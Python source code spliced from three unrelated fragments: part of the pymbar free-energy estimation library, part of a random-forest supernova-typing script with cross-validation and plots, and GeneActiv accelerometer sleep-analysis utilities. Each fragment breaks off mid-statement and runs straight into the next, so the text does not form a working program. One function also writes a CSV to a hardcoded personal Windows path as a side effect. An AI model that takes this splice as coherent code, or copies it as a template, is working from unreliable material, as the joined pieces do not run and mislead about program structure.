Compute singular values and right singular vectors of W without using SVD # Instead, we compute eigenvalues and eigenvectors of W'W. # Note W'W = (U S V')'(U S V') = V S' U' U S V' = V (S'S) V' [S2, V] = numpy.linalg.eigh(W.T * W) # Set any slightly negative eigenvalues to zero. S2[numpy.where(S2 < 0.0)] = 0.0 # Form matrix of singular values Sigma, and V. Sigma = numpy.matrix(numpy.diag(numpy.sqrt(S2))) V = numpy.matrix(V) # Compute covariance Theta = V * Sigma * self._pseudoinverse(I - Sigma * V.T * Ndiag * V * Sigma) * Sigma * V.T elif method == 'tan-HGH': # Use method suggested by Zhiqiang Tan without further simplification. # TODO: There may be a problem here -- double-check this. [N,K] = W.shape # Estimate O matrix from W'W. W = numpy.matrix(W, dtype=numpy.float64) O = W.T * W # Assemble the Lambda matrix. Lambda = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64) # Identity matrix. I = numpy.matrix(numpy.eye(K), dtype=numpy.float64) # Compute H and G matrices. H = O*Lambda - I G = O - O*Lambda*O # Compute pseudoinverse of H Hinv = self._pseudoinverse(H) # Compute estimate of asymptotic covariance. Theta = Hinv * G * Hinv.T elif method == 'tan': # Use method suggested by <NAME>. # Estimate O matrix from W'W. W = numpy.matrix(W, dtype=numpy.float64) O = W.T * W # Assemble the Lambda matrix. Lambda = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64) # Compute covariance. Oinv = self._pseudoinverse(O) Theta = self._pseudoinverse(Oinv - Lambda) else: # Raise an exception. raise ParameterError('Method ' + method + ' unrecognized.') return Theta #============================================================================================= def _initializeFreeEnergies(self, verbose=False, method='zeros'): """ Compute an initial guess at the relative free energies. OPTIONAL ARGUMENTS verbose (boolean) - If True, will print debug information (default: False) method (string) - Method for initializing guess at free energies. 'zeros' - all free energies are initially set to zero 'mean-reduced-potential' - the mean reduced potential is used """ if (method == 'zeros'): # Use zeros for initial free energies. if verbose: print "Initializing free energies to zero." self.f_k[:] = 0.0 elif (method == 'mean-reduced-potential'): # Compute initial guess at free energies from the mean reduced potential from each state if verbose: print "Initializing free energies with mean reduced potential for each state." means = numpy.zeros([self.K],float) for k in self.nonzero_N_k_indices: means[k] = self.u_kln[k,k,0:self.N_k[k]].mean() if (numpy.max(numpy.abs(means)) < 0.000001): print "Warning: All mean reduced potentials are close to zero. If you are using energy differences in the u_kln matrix, then the mean reduced potentials will be zero, and this is expected behavoir." self.f_k = means elif (method == 'BAR'): # TODO: Can we guess a good path for this initial guess for arbitrary "topologies"? # For now, make a simple list of those states with samples. initialization_order = numpy.where(self.N_k > 0)[0] # Initialize all f_k to zero. self.f_k[:] = 0.0 # Initialize the rest for index in range(0, numpy.size(initialization_order)-1): k = initialization_order[index] l = initialization_order[index+1] w_F = (self.u_kln[k, l, 0:self.N_k[k]] - self.u_kln[k, k, 0:self.N_k[k]]) # forward work w_R = (self.u_kln[l, k, 0:self.N_k[l]] - self.u_kln[l, l, 0:self.N_k[l]]) # reverse work if (len(w_F) > 0 and len(w_R) > 0): # BAR solution doesn't need to be incredibly accurate to kickstart NR. self.f_k[l] = self.f_k[k] + computeBAR(w_F, w_R, relative_tolerance=0.000001, verbose=False, compute_uncertainty=False) else: # no states observed, so we don't need to initialize this free energy anyway, as # the solution is noniterative. self.f_k[l] = 0 else: # The specified method is not implemented. raise ParameterError('Method ' + method + ' unrecognized.') # Shift all free energies such that f_0 = 0. self.f_k[:] = self.f_k[:] - self.f_k[0] return #============================================================================================= def _computeUnnormalizedLogWeights(self, u_kn): """ Return unnormalized log weights. REQUIRED ARGUMENTS u_kn (K x N_max numpy float64 array) - reduced potential energies OPTIONAL ARGUMENTS RETURN VALUES log_w_kn (K x N_max numpy float64 array) - unnormalized log weights REFERENCE 'log weights' here refers to \log [ \sum_{k=1}^K N_k exp[f_k - (u_k(x_n) - u(x_n)] ] """ if (self.use_embedded_helper_code): # Use embedded C++ optimizations. import _pymbar u_kn = numpy.array(u_kn, dtype=numpy.float64) # necessary for helper code to interpret type of u_kn log_w_kn = _pymbar.computeUnnormalizedLogWeightsCpp(self.K, self.N_max, self.K_nonzero, self.nonzero_N_k_indices, self.N_k, self.f_k, self.u_kln, u_kn); else: try: #z= 1/0 #pass from scipy import weave # Allocate storage for return values. log_w_kn = numpy.zeros([self.K,self.N_max], dtype=numpy.float64) # Copy useful class members to local variables. K = self.K f_k = self.f_k N_k = self.N_k u_kln = self.u_kln # Weave inline C++ code. code = """ double log_terms[%(K)d]; // temporary storage for log terms for (int k = 0; k < K; k++) { for (int n = 0; n < N_K1(k); n++) { double max_log_term = 0.0; bool first_nonzero = true; for (int j = 0; j < K; j++) { // skip empty states if (N_K1(j) == 0) continue; double log_term = log(N_K1(j)) + F_K1(j) - U_KLN3(k,j,n) + U_KN2(k,n); log_terms[j] = log_term; if (first_nonzero || (log_term > max_log_term)) { max_log_term = log_term; first_nonzero = false; } } double term_sum = 0.0; for (int j = 0; j < K; j++) { // skip empty states if (N_K1(j) == 0) continue; term_sum += exp(log_terms[j] - max_log_term); } double log_term_sum = log(term_sum) + max_log_term; LOG_W_KN2(k,n) = - log_term_sum; } } """ % vars() # Execute inline C code with weave. info = weave.inline(code, ['K', 'N_k', 'u_kn', 'u_kln', 'f_k', 'log_w_kn'], headers=['<math.h>', '<stdlib.h>'], verbose=2) except: # Compute unnormalized log weights in pure
n_bins=Nbins_RFP) print "Fraction of True Positives in",Nbins_RFP,"probabilty bins" print ' '.join(['{:.3f}'.format(f) for f in fraction_true]) #TEMPLATE STATISTICS print "\nTemplate Statistics for {} Data".format(sim) templates, counts = np.unique(data_test['sim_nonIa'].quantity.value, return_counts=True) template_dict = dict(zip(templates, counts)) #statistics for numbers of true and ML types for each template template_stats={} for tmplt in template_dict: template_stats[tmplt]={} for typ in MLtypes: template_stats[tmplt][CLFid+typ]=np.sum(predict[Test][typ] & (data_test['sim_nonIa']==tmplt)) template_stats[tmplt]['True'+typ]=np.sum(true[Test][typ] & (data_test['sim_nonIa']==tmplt)) if(template_stats[tmplt]['True'+typ]>0): template_stats[tmplt]['Type']=typ #count template occurrences for SN classified as Ia CLFIa_mask = (probs[sim] > P_eff[sim]) CLFIa_templates, CLFIa_counts = np.unique(data_test['sim_nonIa'][CLFIa_mask].quantity.value, return_counts=True) Iatemplate_dict = dict(zip(CLFIa_templates, CLFIa_counts)) print "\nType\t|\tValue" #need to print in frequency order keys=Iatemplate_dict.keys() template_freq = sorted(Iatemplate_dict.values()) template_freq.reverse() ordered_keys=[] for freq in template_freq: #index=freqs.index(freq) for key in keys: if Iatemplate_dict[key]==freq: if not(key in ordered_keys): print key,'\t|\t' ,freq ordered_keys.append(key) npop=5 print npop,"most popular templates and frequencies for passing MLIa",ordered_keys[0:npop],template_freq[0:npop] #sys.exit() #CROSS_VALIDATION # read in data if(args.cv): if(args.sample=='t'): data_all = ttrain # read in validation data only elif(args.sample=='v'): data_all = ttest # combine both training and validation sets elif(args.sample=='b'): data_all = vstack([ttrain, ttest]) #data_all = read_sample() snr_cut = data_all['snr1']>SNRcut # no cut at the moment data = data_all[snr_cut] X_data = get_features(args.ft, data) # Get y_data (class labels) if(args.nclass==2): print '\n\t2-WAY CLASSIFICATION' y_data = data['type'] # class 1=Ia match, 0=CC match elif(args.nclass==3): print '\n\t3-WAY CLASSIFICATION' y_data = data['type3'] #3-way typing #y_ROC = data['type'] # for ROC curve, need binary labels cvclf = RandomForestClassifier(n_estimators=n_estimators, max_features=max_features, \ min_samples_split=min_samples_split, criterion=criterion, n_jobs=args.nc) print '\n\nNow try cross-validation methods ...' # Stratified k-fold cross-validation and compute scoring metric each time print '\n----- Stratified K-fold cross-validation -----\n' kvals = [] avgskf = [] stdkf = [] for k in range(2, 11): kf = StratifiedKFold(y_data, n_folds=k, shuffle=True, random_state=42) # define cross validator cv_scores_kf = cross_val_score(cvclf, X_data, y_data, scoring=score_func_est, cv=kf) print 'k={} folds CV scores : '.format(k), cv_scores_kf kvals.append(k) avgskf.append(np.mean(cv_scores_kf)) stdkf.append(np.std(cv_scores_kf)/np.sqrt(float(len(cv_scores_kf)))) # ShuffleSplit with n iterations print '\n\n----- ShuffleSplit iterations -----' test_step = 0.1 tsvals = [] avgss = [] stdss = [] for ts in np.arange(0.1, 1, test_step): print 'Fractional Test Size : ', ts ss = ShuffleSplit(len(y_data), n_iter=args.niter, test_size=ts, random_state=42) # BUG: don't use train_size for train_index, test_index in ss: train1as = y_data[train_index]==0 test1as = y_data[test_index]==0 print "TRAIN SNIa:", np.sum(train1as), "\tTEST SNIa:", np.sum(test1as) cv_scores_ss = cross_val_score(cvclf, X_data, y_data, scoring=score_func_est, cv=ss) #array of score values print '\nCV scores (ShuffleSplit) = ', cv_scores_ss #print 'Average Score = ', np.mean(cv_scores_ss) #print 'Score Standard Deviation = ', np.std(cv_scores_ss) tsvals.append(ts) avgss.append(np.mean(cv_scores_ss)) stdss.append(np.std(cv_scores_ss)/np.sqrt(float(len(cv_scores_ss)))) #endif--args.cv if(args.pc): pfilename='DES_validation_fitprob_purity=' print "\nUsing purities",args.purities,"for test files" pscores=[] for purity in args.purities: ptestfile=pfilename+str(purity)+'.txt' ptest=read(ptestfile) #print "Size of purity =",purity,"test data:",len(ptest) cutptest=(ptest['snr1']>SNRcut) ptest = ptest[cutptest] print "Size of purity =",purity,"test data (after SNR cut):",len(ptest) X_ptest=get_features(args.ft, ptest) if(args.nclass==2): y_ptest = ptest['type'] elif(args.nclass==3): y_ptest = ptest['type3'] elif(args.nclass==4): y_ptest = ptest['type2x2'] pprobs=clf.predict_proba(X_ptest)[:, 0] # SNeIa are class 0 #print len(X_ptest),len(pprobs),len(y_ptest) pscore=score_func(pprobs, y_ptest) print "Score for purity",purity,"=",pscore pscores.append(pscore) #endfor #endif--args.pc if(len(args.plotdir)==0): print "Skipping plots and exiting" sys.exit() else: print '\n********** STARTING PLOTS **********\n' #setup pdf file name and other filenames for saving efficiencies etc file_id='_{}'.format(args.filestr) fnpurity='' SNR='' if ('purity' in args.test): fnpurity='purity'+re.split('purity',os.path.splitext(args.test)[0])[1] if ('SNR' in args.test): SNR='SNR'+re.split('SNR',os.path.splitext(args.test)[0])[1] if(len(datalist)>0): dname='_'+'+'.join(datalist)+'Data' else: dname='' pdfname = os.path.join(args.plotdir,'_'.join(['eff_pur_DES',str(args.nclass),'way_typing',str(nfeatures)+'features',SNR,fnpurity])+withpdf+dname+file_id+'.pdf') multiPdf = PdfPages(pdfname) #Setup "sim" data to plot alldata={} mask={} #setup cuts according to type and save in alldata dict for sim in simlist: if (sim==Training): simdata=data_train simlabel=Training else: simdata=data_test simlabel=Test simdata['true_mu']=simdata['sim_mu'] #augment simdata with other variables simdata[HR]=simdata['mu']-simdata['sim_mu'] #Hubble Residual #add to dict smaskIa=simdata['sim_nonIa']==0 smaskCC=simdata['sim_nonIa']>0 smaskIbc=simdata['type3']==1 smaskII=simdata['type3']==2 mask[sim]={Ia:smaskIa,CC:smaskCC,Ibc:smaskIbc,II:smaskII} alldata[sim]={Ia:simdata[mask[sim][Ia]],CC:simdata[mask[sim][CC]],Ibc:simdata[mask[sim][Ibc]],II:simdata[mask[sim][II]],Total:simdata} #plotlabels[Sim][simlabel]=plotlabels[Sim][simlabel] + ' Data' #add CLFtype, TP and FP to dict for samples != Training if not(sim==Training): for t in MLtypes: alldata[sim][CLFid+t]=simdata[predict[sim][t]] alldata[sim][CLFid+TP+t]=simdata[CLFstats[sim][TP][t]] alldata[sim][CLFid+FP+t]=simdata[CLFstats[sim][FP][t]] #add CLFTotal for consistency and weights; will not need totals for TP and FP types alldata[sim][CLFid+Total]=simdata for key in sorted(alldata.keys()): print "\nPlotting",key,"(simulated) data:" for t in alldata[key].keys(): print "Number of type {} = {}".format(t,len(alldata[key][t])) #Setup "observed" data to plot obsdata={} P_eff_ref = P_eff[Test] for data in MLdatalist: #loop over data to plot; always include Test for plots requiring CLF classified data (eg HR plots) if(data==Test): #setup entries to fill dicts #obslabel='Test' obsdata=data_test obsdata['true_mu']=obsdata['sim_mu'] obsIa=obsdata['sim_nonIa']==0 obsCC=obsdata['sim_nonIa']>0 obsIbc=obsdata['type3']==1 obsII=obsdata['type3']==2 elif(data==Spec): #obslabel='Spec.' obsdata=data_spec obsIa=obsdata['spec_eval']=='SNIa' obsCC=obsdata['spec_eval']!='SNIa' obsII=obsdata['spec_eval']=='SNII' obsIbc=(obsdata['spec_eval']!='SNIa') & (obsdata['spec_eval']!='SNII') elif(data==Spec_nofp): #obsdata=data_spec_nofp obslabel='Spec. No $f_p$ Cut ' obsIa=obsdata['spec_eval']=='SNIa' obsCC=obsdata['spec_eval']!='SNIa' obsII=obsdata['spec_eval']=='SNII' obsIbc=(obsdata['spec_eval']!='SNIa') & (obsdata['spec_eval']!='SNII') elif(data==Phot): #obslabel='Phot.' obsdata=data_phot #special case of phot test data if('sim_mu' in obsdata.keys()): obsdata['true_mu']=obsdata['sim_mu'] #unknown true types; all False masks obsIa=np.zeros(len(obsdata['snid']),dtype=bool) obsCC=np.zeros(len(obsdata['snid']),dtype=bool) obsIbc=np.zeros(len(obsdata['snid']),dtype=bool) obsII=np.zeros(len(obsdata['snid']),dtype=bool) #save mask mask[data]={Ia:obsIa,CC:obsCC,Ibc:obsIbc,II:obsII} omask={Ia:obsIa,CC:obsCC,Ibc:obsIbc,II:obsII} #save label #plotlabels[Data][data]=plotlabels[Data][data]+' Data' #ML-type labeled observed data if(not(data in predict.keys())): #data_test already typed and predictions printed predict[data]={} X_data = get_features(args.ft, obsdata) dataprobs=clf.predict_proba(X_data) predict[data][Ia] = dataprobs[:, 0]>P_eff_ref predict[data][CC] = ~predict[data][Ia] #compute true mu cosmo = FlatLambdaCDM(H0=H0, Om0=OmegaM) obsdata['true_mu']=cosmo.distmod(obsdata['z']) if (args.nclass==3): predict[data][II]=(dataprobs[:,0]<P_eff_ref) & (dataprobs[:,2]>dataprobs[:,1]) predict[data][Ibc]=(~predict[data][Ia]) & (~predict[data][II]) #print summary print for t in MLtypes: print 'Predicted number of {} Data {} with P_thresh {:0.3f} = {}'.format(data, t, float(P_eff_ref), np.sum(predict[data][t])) #fill and print some more stats CLFstats[data]={} if((np.sum(omask[Ia]) + np.sum(omask[CC])) > 0): CLFstats[data][TP]={Ia:(predict[data][Ia] & omask[Ia]),CC:(predict[data][CC] & omask[CC])} CLFstats[data][FP]={Ia:(predict[data][Ia] & ~omask[Ia]),CC:(predict[data][CC] & ~omask[CC])} if (args.nclass==3): CLFstats[data][TP][II]= predict[data][II] & omask[II] CLFstats[data][TP][Ibc]= predict[data][Ibc] & omask[Ibc] CLFstats[data][FP][II]= predict[data][II] & ~omask[II] CLFstats[data][FP][Ibc]= predict[data][Ibc] & ~omask[Ibc] for t in MLtypes: print 'Correct (true positive) number of {} Data {} = {}'.format(data,t, np.sum(CLFstats[data][TP][t])) print 'Incorrect (false positive) number of {} Data {} = {}'.format(data,t,np.sum(CLFstats[data][FP][t])) else: print "{} data is unlabeled: true types not available".format(data) #augment variables in data here if ('true_mu' in obsdata.keys()): obsdata[HR]=obsdata['mu']-obsdata['true_mu'] #Hubble Residual #now fill dict if not already included if(not(data in alldata.keys())): alldata[data]={Ia:obsdata[obsIa],CC:obsdata[obsCC],Ibc:obsdata[obsIbc],II:obsdata[obsII],Total:obsdata} #add CLFtype, TP and FP types to data dict for t in MLtypes: alldata[data][CLFid+t]=obsdata[predict[data][t]] if(TP in CLFstats[data].keys()): alldata[data][CLFid+TP+t]=obsdata[CLFstats[data][TP][t]] alldata[data][CLFid+FP+t]=obsdata[CLFstats[data][FP][t]] #add CLFTotal for consistency and weights; no totals for TP and FP types alldata[data][CLFid+Total]=obsdata #summarize extra data to be plotted if(data in datalist): print "\nPlotting",plotlabels[Data][data],'as "observed" data:' for t in alldata[data].keys(): print "Number of type {} = {}".format(t,len(alldata[data][t])) #endfor-datalist #special printout here if(data==Spec): print alldata[Spec][RFFPIa]['snid'] print alldata[Spec][RFFPIa]['spec_eval'] print alldata[Spec][RFFPIa]['fit_pr'] print alldata[Spec][RFFPIa]['x1'] print alldata[Spec][RFFPIa]['c'] print alldata[Spec][RFFPIa]['z'] print alldata[Spec][RFFPIa]['mB'] #compute normalizations and weights for data plots (scale sims/secondary data by primary observed data set) weights={} if(len(datalist)>0): data0=datalist[0] #primary observed dataset in datalist #print alldata[data0].keys() #lengths=[len(alldata[data0][key]) for key in alldata[data0].keys()] #print lengths for key in alldata.keys(): #compute renormalization factors print '\nNormalization factors for {} Data:\n'.format(key) weights={} if(args.weights==ByType): #accumulate weights by type norm={} #for t in MLtypes + CLFtypes: for t in MLtypes + CLFtypes + allTPFPtypes: if(alldata[key].has_key(t) and len(alldata[key][t])>0): #t exists and has data if (len(datalist)>0): if(alldata[data0].has_key(t) and len(alldata[data0][t])>0): #t exists and has data norm[t]=float(len(alldata[data0][t]))/float(len(alldata[key][t])) else: print "Type {} not available for {} Data".format(t,data0) #for Phot data, only CLF weights available; btyp=t[t.find('I'):len(t)] if 'I' in t else CC #parse t to find base SN type subt=CLFid+btyp print "Computing weights using type {} instead".format(subt) if(alldata[key].has_key(subt) and len(alldata[key][subt])>0): #Training data doesn't have CLF types norm[t]=float(len(alldata[data0][subt]))/float(len(alldata[key][subt])) elif(alldata[key].has_key(btyp)): print "Type {} not available for {} Data".format(subt,key) norm[t]=float(len(alldata[data0][subt]))/float(len(alldata[key][btyp])) print "Computing weights using type {} instead".format(btyp) else: "No appropriate substitute weights for {} in {} and {}".format(t, key, data0) else: norm[t]=1.0 weights[t]=np.array([norm[t]]*len(alldata[key][t])) print "Setting up {} {} weights for type {}".format(len(alldata[key][t]), args.weights, t) else: norm[t]=0.0 print "No data: Skipping {} weights for type {}".format(args.weights, t) print 'n({}) ={:0.3f}\n'.format(t, norm[t]) #Total weights need different values for each type #Check cases for which type does not exist in data (no Ia etc. in Phot data) #print norm.keys() if (key!=Phot): weights[Total]=np.array([norm[Ia]]*len(alldata[key][Total])) if(key!=Training): weights[CLFid+Total]=np.array([norm[CLFid+Ia]]*len(alldata[key][Total])) if (key!=Phot) and (key!=Training): #if (norm.has_key(CLFid+TP+Ia)): weights[CLFid+TP+Total]=np.array([norm[CLFid+TP+Ia]]*len(alldata[key][Total])) #else: # weights[CLFid+TP+Total]=np.array([0.]*len(alldata[key][Total])) #if (norm.has_key(CLFid+FP+Ia)): weights[CLFid+FP+Total]=np.array([norm[CLFid+FP+Ia]]*len(alldata[key][Total])) #else: # weights[CLFid+FP+Total]=np.array([0.]*len(alldata[key][Total])) if (args.nclass==3): #overwrite array to match MLtypes if (key!=Phot): weights[Total][mask[key][Ibc]]=norm[Ibc] weights[Total][mask[key][II]]=norm[II] if(key!=Training): weights[CLFid+Total][predict[key][Ibc]]=norm[CLFid+Ibc] weights[CLFid+Total][predict[key][II]]=norm[CLFid+II] if (key!=Phot) and (key!=Training): weights[CLFid+TP+Total][CLFstats[key][TP][Ibc]]=norm[CLFid+TP+Ibc] weights[CLFid+FP+Total][CLFstats[key][FP][Ibc]]=norm[CLFid+FP+Ibc] weights[CLFid+TP+Total][CLFstats[key][TP][II]]=norm[CLFid+TP+II] weights[CLFid+FP+Total][CLFstats[key][FP][II]]=norm[CLFid+FP+II] else: if (key!=Phot): weights[Total][mask[key][CC]]=norm[CC] if(key!=Training): weights[CLFid+Total][predict[key][CC]]=norm[CLFid+CC] if (key!=Phot) and (key!=Training): weights[CLFid+TP+Total][CLFstats[key][TP][CC]]=norm[CLFid+TP+CC] weights[CLFid+FP+Total][CLFstats[key][FP][CC]]=norm[CLFid+FP+CC] else: #constant weights (calculate for all keys even if not needed for Training etc. data) if (len(datalist)>0): weights[Total]=np.array([float(len(alldata[data0]))/float(len(alldata[key]))]*len(alldata[key][Total])) else: weights[Total]=np.array([1.0]*len(alldata[key][Total])) weights[CLFid+Total]=weights[Total] weights[CLFid+TP+Total]=weights[Total] weights[CLFid+FP+Total]=weights[Total] #save in dict alldata[key][Weights]=weights #print key,alldata[key][Weights].keys() #old format #Iaweights=np.array([normIa]*len(sim[Ia])) #CCweights=np.array([normCC]*len(sim[CC])) #Ibcweights=np.array([normIbc]*len(sim[Ibc])) #IIweights=np.array([normII]*len(sim[II])) #save SN Totals in dict for cuts SNTotals={} for key in alldata.keys(): SNTotals[key]={} for t in plottypes: if(t in alldata[key].keys()): SNTotals[key][t]=float(len(alldata[key][t])) #print key, t, SNTotals[key][t] print '\nDefault plottypes=',str(plottypes) # PLOT VARIABLES ################### npages=1 ################################################################### #page probs print "\nStarting page",npages,"(page probs)" #populate dict of probabilities for Test Data using array from probs dict CLFprobs={} data = Test for t in MLtypes: CLFprobs[t]={'probs':probs[data][true[data][t]]} fig = plt.figure(figsize=(15,7)) p_binwidth = 0.05 p_bins = np.arange(-0.1, 1.05, p_binwidth) f = fig.add_subplot(231) plot_types(MLtypes,'probs',CLFprobs,xlabel='Random Forest
<gh_stars>1-10 import pandas as pd import struct import numpy as np from more_itertools import run_length from bitstring import BitArray from scipy import signal def bin2df(full_path): """ Reads geneactiv .bin files into a pandas dataframe. Parameters ---------- full_path : str Full path to the geneactiv .bin file. Returns ------- decode : dataframe Dataframe of decoded geneactiv data. """ with open(full_path, "rb") as in_file: full_line = in_file.readline() count = 0 fs = "" df = [] while full_line: full_line = in_file.readline() line = full_line[:].split(b"\r\n")[0] count += 1 if count < 60: if b"x gain" in line: x_gain = int(line.split(b":")[-1]) if b"x offset" in line: x_offset = int(line.split(b":")[-1]) if b"y gain" in line: y_gain = int(line.split(b":")[-1]) if b"y offset" in line: y_offset = int(line.split(b":")[-1]) if b"z gain" in line: z_gain = int(line.split(b":")[-1]) if b"z offset" in line: z_offset = int(line.split(b":")[-1]) if b"Volts" in line: volts = int(line.split(b":")[-1]) if b"Lux" in line: lux = int(line.split(b":")[-1]) if b"Page Time:" in line: time = pd.to_datetime( ":".join(line.decode().split(":")[1:])[0:-2], format="%Y-%m-%d %H:%M:%S:%f", ) if b"Temperature:" in line: temp = float(line.split(b":")[-1]) if not fs: if b"Measurement Frequency:" in line: fs = float(line.split(b":")[-1].split(b" ")[0]) offset = np.array([1 / fs] * 300) * np.arange(0, 300) delta = pd.to_timedelta(offset, unit="s") if len(line) == 3600: # hex to bin hexes = struct.unpack(b"12s " * 300, line) bins = ( struct.unpack( b"12s 12s 12s 10s 1s 1s", bin(int(hx, 16))[2:].zfill(48).encode(), ) for hx in hexes ) decode = pd.DataFrame( bins, columns=["X", "Y", "Z", "LUX", "Button", "_"], index=pd.DatetimeIndex([time] * 300) + delta, ) # binary to decimal and calibration decode.X = decode.X.apply( lambda x: round( (BitArray(bin=x.decode()).int * 100.0 - x_offset) / x_gain, 4 ) ) decode.Y = decode.Y.apply( lambda x: round( (BitArray(bin=x.decode()).int * 100.0 - y_offset) / y_gain, 4 ) ) decode.Z = decode.Z.apply( lambda x: round( (BitArray(bin=x.decode()).int * 100.0 - z_offset) / z_gain, 4 ) ) decode.LUX = decode.LUX.apply(lambda x: int(int(x, 2) * lux / volts)) decode["T"] = temp df.append(decode) df = pd.concat(df, axis=0) df.index.name = "Time" df.to_csv(r'C:\Users\tdavi\Desktop\demo_data.csv', index=False, header=True) return df[["X", "Y", "Z", "LUX", "T"]] def non_overlapping_windows(df, window_size): """ Slices input data frame into windows of specified size. Parameters ---------- df : data frame Data frame to be windowed along the vertical axis. window_size : int Window size in number of samples. Returns ------- windowed_data : numpy array Data windowed to the specified size. """ data_mat = np.asarray(df) r, c = data_mat.shape num_windows = r // window_size data_mat = data_mat[0 : num_windows * window_size, :] windowed_data = data_mat.reshape(num_windows, window_size, c) return windowed_data def activity_index(windowed_array): """ Compute activity index of windowed tri-axis accelerometer signal. Activity index defined here as: sqrt(mean(vx, vy, vz)) where vx, vy, vz are the variances in x, y, z Activity index accounting for device specific systematic variance is defined as: sqrt(max(mean(vx-vsx, vy-vsy, vz-vsz), 0)) where vx, vy, vz are defined as above and vsx, vsy, vsz are the axis specific systematic variances Parameters ---------- windowed_array : array-like Full X,Y,Z tri-axis accelerometer signal with dimensions [number of windows, size of window, 3] Returns ------- activity_indices : array-like Array of activity indices for input signal. """ activity_indices = (np.var(windowed_array, axis=2).mean(axis=1) ** 0.5).reshape( -1, 1 ) return activity_indices def high_pass_filter(windowed_array, sampling_rate, hp_cutoff, order): """ High-pass filter a given windowed sensor signal. Parameters ---------- windowed_array : array-like Sensor signal windowed with shape [number_of_windows, samples_per_window, number_of_data_channels]. sampling_rate : float hp_cutoff : float High pass filter cutoff. order : int Order of the filter. Returns ------- filtered : array-like High pass filtered data. """ critical_frequency = [hp_cutoff * 2.0 / sampling_rate] # NUMERATOR AND DENOMINATOR OF IIR filter [b, a] = signal.butter( N=order, Wn=critical_frequency, btype="highpass", analog=False ) # APPLY FILTER filtered = signal.filtfilt(b, a, windowed_array, padlen=10, axis=1) return filtered def load_geneactiv_csv(full_path): """ Loads geneactiv csv data into a pandas dataframe. Parameters ---------- full_path : string Full path to a geneactiv accelerometer csv file. Returns ------- df : data frame Pandas data frame of geneactiv accelerometer data including temperature and light. """ df = pd.read_csv( full_path, index_col=0, skiprows=100, header=None, names=["Time", "X", "Y", "Z", "LUX", "Button", "T"], usecols=["Time", "X", "Y", "Z", "LUX", "T"], dtype={ "Time": object, "X": np.float64, "Y": np.float64, "Z": np.float64, "LUX": np.int64, "Button": bool, "T": np.float64, }, low_memory=False, ) df.index = pd.to_datetime(df.index, format="%Y-%m-%d %H:%M:%S:%f").values return df[["X", "Y", "Z", "LUX", "T"]] def downsample_by_mean(df, fs="50L"): """ Downsamples a pandas data frame to a desired frequency by mean based aggregation. Parameters ---------- df : data frame Data to be downsampled. Data frame must have pandas date time index. fs : str New sampling rate in string format. Returns ------- downsampled data frame """ return df.resample(fs).mean() def downsample(df, factor): """ Downsamples a pandas data frame to a desired frequency after using an antialiasing filter. Parameters ---------- df : data frame Data to be downsampled. factor : int Factor by which to downsample. Returns ------- df : data frame Downsampled data frame """ # START AND STOP OF INDEX start = df.index[0] end = df.index[-1] # COLUMN NAMES cols = df.columns # DOWNSAMPLE ds = signal.decimate(df.values, q=factor, axis=0) # BUILD INDEX idx = pd.date_range(start, end, len(ds)) # RECONSTRUCT DATA FRAME df = pd.DataFrame(ds) df.index = idx df.columns = cols return df def make_dummy_data(freq="50L"): """ Makes dummy sleep data. Default dummy data is 24 hours at 20hz. Sleep window from 10pm to 8am. Temperature set at 27 degrees celsius. Parameters ---------- freq : string Frequency expressed as string. 20hz Default expressed as "50L". 100hz as "10L". Returns ------- input_df, start_sleep, end_sleep : 3-tuple of data frame, date-time object, date-time object Dataframe of dummy sleep data, start of sleep window, end of sleep window. """ # START AND END DATES start = pd.to_datetime("2018-01-01 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f") end = pd.to_datetime("2018-01-02 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f") # SLEEP PERIOD start_sleep = pd.to_datetime( "2018-01-01 22:00:00:000", format="%Y-%m-%d %H:%M:%S:%f" ) end_sleep = pd.to_datetime("2018-01-02 7:00:00:000", format="%Y-%m-%d %H:%M:%S:%f") # DUMMY DATE time = pd.date_range(start, end, freq=freq) data = np.random.uniform(-100, 100, [len(time), 5]) # DATA FRAME input_df = pd.DataFrame(data) input_df.columns = ["X", "Y", "Z", "T", "LUX"] input_df.index = time # INSERT SLEEP PERIOD + TEMPERATURE VALUES input_df[start_sleep:end_sleep] = 0.001 input_df["T"] = 27.0 input_df["LUX"] = np.random.uniform(0, 80, [len(time)]) return input_df, start_sleep, end_sleep # # START AND END DATES # start = pd.to_datetime("2018-01-01 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f") # end = pd.to_datetime("2018-01-02 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f") # # # SLEEP PERIOD # start_sleep = pd.to_datetime( # "2018-01-01 22:00:00:000", format="%Y-%m-%d %H:%M:%S:%f" # ) # end_sleep = pd.to_datetime("2018-01-02 7:00:00:000", format="%Y-%m-%d %H:%M:%S:%f") def import_dummy_data(json_data, freq="50L"): """ Makes dummy sleep data. Default dummy data is 24 hours at 20hz. Sleep window from 10pm to 8am. Temperature set at 27 degrees celsius. Parameters ---------- freq : string Frequency expressed as string. 20hz Default expressed as "50L". 100hz as "10L". Returns ------- input_df, start_sleep, end_sleep : 3-tuple of data frame, date-time object, date-time object Dataframe of dummy sleep data, start of sleep window, end of sleep window. """ # START AND END DATES start = pd.to_datetime("2018-01-01 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f") end = pd.to_datetime("2018-01-02 2:33:48:700", format="%Y-%m-%d %H:%M:%S:%f") # SLEEP PERIOD start_sleep = pd.to_datetime( "2018-01-01 22:00:00:000", format="%Y-%m-%d %H:%M:%S:%f" ) end_sleep = pd.to_datetime("2018-01-02 7:00:00:000", format="%Y-%m-%d %H:%M:%S:%f") # DUMMY DATE time = pd.date_range(start, end, freq=freq) df = pd.DataFrame(json_data, columns=["X", "Y", "Z", "T", "LUX"], index=time) return df, start_sleep, end_sleep def total_sleep_time(predictions): """ Calculates total sleep time on an array of sleep/wake predictions in one minute epochs. Parameters ---------- predictions : array-like Binary sleep/wake predictions. Awake encoded as 1 and sleep as 0. Returns ------- tst : int Total time spent asleep based on sleep/wake predictions provided. """ tst = len(predictions) - predictions.sum() return int(tst) def percent_time_asleep(predictions): """ Calculates the percent of time spent asleep on an array of sleep/wake predictions in one minute epochs. Parameters ---------- predictions : array-like Binary sleep/wake predictions. Awake encoded as 1 and sleep as 0. Returns ------- pta : float Percentage of time spent asleep based on sleep/wake predictions provided. """ pta = 100.0 * (len(predictions) - predictions.sum()) / float(len(predictions)) return np.round(pta, decimals=3) def number_of_wake_bouts(predictions): """ Calculates the number of wake bouts present in an array of 